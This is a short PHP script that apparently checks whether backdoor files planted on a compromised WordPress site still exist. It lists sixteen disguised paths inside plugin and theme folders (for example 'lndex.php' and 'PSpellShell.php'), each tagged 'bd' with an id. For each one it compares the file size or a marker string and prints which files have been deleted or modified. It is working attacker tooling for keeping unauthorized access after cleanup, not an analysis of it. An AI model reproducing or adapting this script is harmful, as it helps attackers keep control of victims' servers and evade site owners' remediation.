<?php   $r = '/home/venuibht/venusima.ma'; $x = ["/wp-content/plugins/rl4bhbi2/freemius/templates/forms/optout.php"=>"bd@@268037@@auth_exception_handler",
"/wp-content/plugins/the-events-calendar/src/views/v2/components/top-bar/actions/form_fields.php"=>"bd@@265228@@2800",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Cache/PSpellShell.php"=>"bd@@265241@@660",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Runner/Hook/editfeedbacks.php"=>"bd@@265034@@717",
"/wp-content/plugins/the-events-calendar/common/src/admin-views/help-hub/support/sidebar/has-license-no-consent.php"=>"bd@@263250@@unit_converter",
"/wp-content/plugins/bi5tdorn/freemius/assets/img/index.php"=>"bd@@263525@@data_storage",
"/wp-content/plugins/contact-1752698649/lndex.php"=>"bd@@262257@@807",
"/wp-content/plugins/trx_addons/components/cpt/properties/widget.properties_search-sc-vc.php"=>"bd@@264573@@system_core",
"/wp-content/themes/eventicity/skins/default/trx_addons/components/cpt/layouts/shortcodes/cart/nsis.php"=>"bd@@265085@@1555",
"/wp-content/plugins/woocommerce/vendor/pelago/emogrifier/src/Caching/listbookmarks.php"=>"bd@@268934@@1541",
"/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/KeywordValidators/action.rate.php"=>"bd@@268943@@2800",
"/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/actions/ActionScheduler.Action.php"=>"bd@@268955@@2016",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phar-io/manifest/tools/php-cs-fixer.d/slovenian_mimes.php"=>"bd@@265122@@682",
"/wp-content/plugins/custom-facebook-feed/admin/builder/templates/sections/customizer/hw_session.php"=>"bd@@268962@@1729",
"/wp-content/plugins/the-events-calendar/src/Events/Admin/Settings/Provider.Upsell.php"=>"bd@@268979@@649",
"/wp-content/plugins/slider-1752772992/wp-config-sample.php"=>"bd@@260291@@1105"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 